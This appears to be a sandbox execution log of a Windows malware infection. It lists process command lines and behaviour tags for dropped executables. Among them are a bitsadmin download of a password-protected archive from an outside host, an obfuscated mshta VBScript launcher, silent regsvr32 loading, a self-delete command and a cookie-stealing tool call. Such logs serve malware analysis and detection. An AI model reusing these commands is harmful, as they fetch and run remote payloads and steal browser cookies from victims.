C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z10⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pvnX6Az3B09XYRiZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"10⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p2zJ3SuXA9t5eWq2 -y x C:\zip.7z -o"C:\Program Files\temp_files\"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxAC85.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 128010⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe /8-2222 & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exeC:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe /8-22229⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe" /8-222210⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\System32\CredentialUIBroker.exe"C:\Windows\System32\CredentialUIBroker.exe" AppContainer -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x3e41⤵
-
C:\Users\Admin\AppData\Local\Temp\1109.exeC:\Users\Admin\AppData\Local\Temp\1109.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\18AC.exeC:\Users\Admin\AppData\Local\Temp\18AC.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\21B5.exeC:\Users\Admin\AppData\Local\Temp\21B5.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\8533.exeC:\Users\Admin\AppData\Local\Temp\8533.exe1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\8831.exeC:\Users\Admin\AppData\Local\Temp\8831.exe1⤵
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\A7EF.exeC:\Users\Admin\AppData\Local\Temp\A7EF.exe1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\A7EF.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\B2CE.exeC:\Users\Admin\AppData\Local\Temp\B2CE.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\C0AA.exeC:\Users\Admin\AppData\Local\Temp\C0AA.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\647349126.exe"C:\Users\Admin\AppData\Local\Temp\647349126.exe"2⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\1371397063.exe"C:\Users\Admin\AppData\Local\Temp\1371397063.exe"2⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\C454.exeC:\Users\Admin\AppData\Local\Temp\C454.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\CA9E.exeC:\Users\Admin\AppData\Local\Temp\CA9E.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\D4E0.exeC:\Users\Admin\AppData\Local\Temp\D4E0.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\DB5A.exeC:\Users\Admin\AppData\Local\Temp\DB5A.exe1⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exeC:\Users\Admin\AppData\Local\Temp\E0C9.exe1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\EE38.exeC:\Users\Admin\AppData\Local\Temp\EE38.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\F86A.exeC:\Users\Admin\AppData\Local\Temp\F86A.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\FF51.exeC:\Users\Admin\AppData\Local\Temp\FF51.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\201.exeC:\Users\Admin\AppData\Local\Temp\201.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\742.exeC:\Users\Admin\AppData\Local\Temp\742.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\742.exe"C:\Users\Admin\AppData\Local\Temp\742.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\15AB.exeC:\Users\Admin\AppData\Local\Temp\15AB.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCriPt: CLOse ( cReatEoBJEcT("wSCrIPT.sHelL" ). RUn ( "cmD.EXe /Q /C COpY /y ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" uQLGv.exe > Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF """" == """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" ) do taskkill -IM ""%~nXV"" -F > nul ",0) )2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpY /y "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" uQLGv.exe> Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF "" =="" for %V In ( "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" ) do taskkill -IM "%~nXV" -F> nul3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "uQLGv.exe" -F4⤵
- Kills process with taskkill
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\*\" -spe -an -ai#7zMap19030:2006:7zEvent116241⤵
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\*\" -ad -an -ai#7zMap27134:2006:7zEvent260381⤵
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe"1⤵
- Loads dropped DLL
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\742.exe"C:\Users\Admin\AppData\Local\Temp\742.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\742.exe"C:\Users\Admin\AppData\Local\Temp\742.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\742.exe"C:\Users\Admin\AppData\Local\Temp\742.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\C0AA.exe"C:\Users\Admin\AppData\Local\Temp\C0AA.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\647349126.exe"C:\Users\Admin\AppData\Local\Temp\647349126.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\201.exe"C:\Users\Admin\AppData\Local\Temp\201.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\FF51.exe"C:\Users\Admin\AppData\Local\Temp\FF51.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\C454.exe"C:\Users\Admin\AppData\Local\Temp\C454.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\647349126.exe"C:\Users\Admin\AppData\Local\Temp\647349126.exe"1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\CA9E.exe"C:\Users\Admin\AppData\Local\Temp\CA9E.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\1371397063.exe"C:\Users\Admin\AppData\Local\Temp\1371397063.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\D4E0.exe"C:\Users\Admin\AppData\Local\Temp\D4E0.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\DB5A.exe"C:\Users\Admin\AppData\Local\Temp\DB5A.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"C:\Users\Admin\AppData\Local\Temp\E0C9.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\EE38.exe"C:\Users\Admin\AppData\Local\Temp\EE38.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\F86A.exe"C:\Users\Admin\AppData\Local\Temp\F86A.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\A492.exeC:\Users\Admin\AppData\Local\Temp\A492.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\1109.exe"C:\Users\Admin\AppData\Local\Temp\1109.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\18AC.exe"C:\Users\Admin\AppData\Local\Temp\18AC.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\21B5.exe"C:\Users\Admin\AppData\Local\Temp\21B5.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\8533.exe"C:\Users\Admin\AppData\Local\Temp\8533.exe"1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\8831.exe"C:\Users\Admin\AppData\Local\Temp\8831.exe"1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\haleng.exe"C:\Users\Admin\AppData\Local\Temp\haleng.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"C:\Users\Admin\AppData\Local\Temp\E0C9.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\A492.exe"C:\Users\Admin\AppData\Local\Temp\A492.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\647349126.exe"C:\Users\Admin\AppData\Local\Temp\647349126.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCriPt: CLOse ( cReatEoBJEcT("wSCrIPT.sHelL" ). RUn ( "cmD.EXe /Q /C COpY /y ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" uQLGv.exe > Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF """" == """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" ) do taskkill -IM ""%~nXV"" -F > nul ",0) )2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpY /y "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" uQLGv.exe> Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF "" =="" for %V In ( "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" ) do taskkill -IM "%~nXV" -F> nul3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "uQLGv.exe" -F4⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\A492.exe"C:\Users\Admin\AppData\Local\Temp\A492.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\647349126.exe"C:\Users\Admin\AppData\Local\Temp\647349126.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCriPt: CLOse ( cReatEoBJEcT("wSCrIPT.sHelL" ). RUn ( "cmD.EXe /Q /C COpY /y ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" uQLGv.exe > Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF """" == """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" ) do taskkill -IM ""%~nXV"" -F > nul ",0) )2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpY /y "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" uQLGv.exe> Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF "" =="" for %V In ( "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" ) do taskkill -IM "%~nXV" -F> nul3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "uQLGv.exe" -F4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" .\ma0IL_U1.C_T -u /s2⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"C:\Users\Admin\AppData\Local\Temp\E0C9.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\EE38.exe"C:\Users\Admin\AppData\Local\Temp\EE38.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\D4E0.exe"C:\Users\Admin\AppData\Local\Temp\D4E0.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\A492.exe"C:\Users\Admin\AppData\Local\Temp\A492.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\647349126.exe"C:\Users\Admin\AppData\Local\Temp\647349126.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCriPt: CLOse ( cReatEoBJEcT("wSCrIPT.sHelL" ). RUn ( "cmD.EXe /Q /C COpY /y ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" uQLGv.exe > Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF """" == """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" ) do taskkill -IM ""%~nXV"" -F > nul ",0) )2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpY /y "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" uQLGv.exe> Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF "" =="" for %V In ( "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" ) do taskkill -IM "%~nXV" -F> nul3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "uQLGv.exe" -F4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" .\ma0IL_U1.C_T -u /s2⤵
-
C:\Users\Admin\AppData\Local\Temp\D4E0.exe"C:\Users\Admin\AppData\Local\Temp\D4E0.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCriPt: CLOse ( cReatEoBJEcT("wSCrIPT.sHelL" ). RUn ( "cmD.EXe /Q /C COpY /y ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" uQLGv.exe > Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF """" == """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" ) do taskkill -IM ""%~nXV"" -F > nul ",0) )2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpY /y "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" uQLGv.exe> Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF "" =="" for %V In ( "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" ) do taskkill -IM "%~nXV" -F> nul3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "uQLGv.exe" -F4⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\DB5A.exe"C:\Users\Admin\AppData\Local\Temp\DB5A.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"1⤵
-
